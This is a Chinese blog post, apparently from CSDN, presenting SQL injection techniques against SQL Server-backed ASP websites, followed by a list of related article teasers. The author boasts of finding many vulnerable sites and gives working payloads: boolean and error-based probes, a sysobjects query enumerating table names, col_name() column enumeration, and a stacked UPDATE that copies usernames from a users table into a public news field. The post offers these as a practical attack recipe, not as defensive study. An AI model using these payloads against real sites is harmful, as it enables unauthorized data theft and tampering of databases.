专门针对SQL Server的注入手段

最新推荐文章于 2023-10-02 18:00:00 发布
最新推荐文章于 2023-10-02 18:00:00 发布
阅读量1.2k 收藏
点赞数
分类专栏: Hacker's Tech 文章标签: sql server sql table object 数据库 vb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dengwei007/article/details/40662
版权

小弟潜心研究sql injection一个余月,发现国内存在sql injection漏洞的网站一大把一大把,80%以上的asp网站都似乎是不学无术、骗吃骗喝的“程序员”所做。不光漏洞多,而且网站内部结构也是零乱无比……

关于sql injection网上流传甚广的SQL注入天书可以说是非常不错的入门介绍了,在这里也要重复一些老套的手法。

首先上手的都是1=1,1=2的方法测试验证漏洞,字符则用' or 1=1 or '1'='。

而sql server特别的还有user>0,db_name()>0。但是这些手法都只是检测漏洞的方法,真正有用的在下面。

1、获得所有的Table表名

(Select distinct Top 1 name from sysobjects where xtype='U' and status>0 and name not in (select distinct top i name from sysobjects where xtype='U' and status>0 order by name) order by name)>0

i为一个整数,i取1时,返回第一个table name(按表名排序),2返回第二个,依此类推,直到什么都没有返回为止。

2、得到表名后再获得字段名(field name)

(Select Top 1 col_name(object_id('TableName'),i) from sysobjects)>0

这一句返回TableName这个表里第i个字段的名字

3、得到所有的表名以及里面字段名,估计对这个网站的结构也就有相应的了解了。然后怎样获得字段中的数据呢?

如果是字符串,自然用>0的技俩,如果是其它类型,那就找一个新闻之类的表,再用

;update news set caption=(select username from users where id=9) where newsid=100;--  之类的方法把你要的数据写出来,这样基本上就没有你不知道的内容了。

我自己用VB做了个软件,自动获得表名和字段名,速度极快,瞬间整个数据库的结构就出来了。

当然这些不过是sql语句的构造而已,没什么过多的技术,另外这一个网页也是sql server injection必备的哟http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_tsqlcon_6lyk.asp

dengwei007
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlserver离线安装包
08-16
sqlserver离线安装包
整理出来的SQL注入点关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
sqlserver卸载工具.rar
04-10
sqlserver卸载工具
三步堵死 SQL Server注入漏洞
09-11
SQL Server注入漏洞的一些防范方法分析。
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 4735
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
SQL Server手工注入方式
yy
01-04 5106
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
SQL注入基础
屿的博客
02-14 4309
各位靓仔们是否经常听到sql注入呢,那么什么是sql注入?引用微软官方的语言来说:SQL 注入是一种攻击方式,在这种攻击方式中,在字符串中插入恶意代码,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。构成 SQL 语句的任何过程都应进行注入漏洞审阅,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。那么接下来,让我们来了解一下sql注入是如何产生的。
SQL Server 注入
mingyqf的博客
03-22 2332
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell
最新发布
m0_67844671的博客
10-02 1486
【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
SQL注入总结
qq_46081990的博客
04-22 2869
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
Sql serversql注入
12-14
 关于sql注入的危害在这里不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下  防范sql注入的方法无非有以下几种:  1.使用类型安全的SQL参数  2.使用参数化输入...
sql server注入执行命令
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-12 1456
1. mssql权限 sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限 db权限:文件管理,数据库操作等 users-administrators public权限:数据库操作 guest-users 2、sql server注入执行命令 查询数据库版本,数据库名字,用户名,操作系统 select * from member where id=-1 union select version(),database(),user(),@@version_compile_
Sql serversql注入
2301_78021017的博客
06-10 1249
请注意,设计为在安全环境中运行的程序可能会被复制到不安全的环境中。因此,必须验证所有用户输入,并仔细检查在您所用的服务器中执行构造 SQL 命令的代码。(10)在可能据以构造文件名的字段中,不接受下列字符串:AUX、CLOCK、COM1到COM8、CON、CONFIG、LPT1 到 LPT8、NUL 以及 PRN。但是,如果下一层认为其输入已通过验证,则任何可以绕过客户端的恶意用户就可以不受限制地访问系统。(3)测试字符串变量的内容,只接受所需的值。(2)测试输入的大小和数据类型,强制执行适当的限制。
SQL-Server注入
qq_41781465的博客
08-17 114
col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果 ————————————————————object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。特性:union all select 联合查询要加all。记录了数据库中所有表的字段,常⽤字段为id、name和xtype。object_id(name)可以根据表对象名称得到表对象的ID,:记录了数据库中所有表,常⽤字段为id、name和xtype。@@version 版本。
SQL server 中的SQL 注入
d1996a的博客
09-27 386
SQL server 中的sql注入 实验环境: 在windows server 2008虚拟机中安装SQL server 数据库。安装phpstudy ,通过一台Windows7 访问连接windows server 2008. SQL server 联合注入 首先判断注入点,输入id=1,页面正常回显。 首先判断是否是数值型: id=1 and 1=1,页面正常回显 id=1 and 1=2,页面空显示,可以判断是数值型。 因为有显示位,可以用联合注入进行注入。 首先判断显示位,由此可以看出显示位
SQL server注入
weixin_45958861的博客
09-20 1572
较为复杂 一般不用手工 用工具 1.注入语句 ①*判断数据库类型 and exists (select * from sysobjects)–返回正常为mssql(也名sql server) and exists (select count() from sysobjects)–有时上面那个语句不行就试试这个哈 ②判断数据库版本 and 1=@@version–这个语句要在有回显的模式下才可以哦 and substring((select @@version),22,4)=‘2008’–适用
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1163
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
从0学习sql server注入
hongduilanjun的博客
03-10 1078
一,基本语法: 1.信息收集: 用户: 当前用户名: select user 用户权限: 服务器级别: select IS_SRVROLEMEMBER('sysadmin') 数据库级别: select IS_MEMBER('db_owner') 2005的xp_cmdshell 你要知道他的权限一般是system 而2008他是nt authority\network service 系统: 当前数据库名: select db_name() 数据库版本: select @@version 计
SQLServer数据库注入详解
热门推荐
谢公子的博客
06-28 2万+
目录 SQLServer数据库 修改默认1433端口 SQLServer数据库的管理 SQLServer数据库的查询语句 SA权限开启xp_cmdshell获取主机权限 SA权限使用sp_oacreate执行系统命令 DB_owner权限LOG备份Getshell DB_owner权限差异备份Getshell 盲注SQLServer数据库 SQLServer数据库 SQL S...
c#拼接SQLserversql 防止sql注入
05-23
在 C# 中拼接 SQL ServerSQL 语句时,为了防止 SQL 注入攻击,应该使用参数化查询。 参数化查询是一种将查询参数与 SQL 查询语句分开的技术。这样可以避免 SQL 注入攻击,因为查询参数不会被解释为 SQL 代码。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值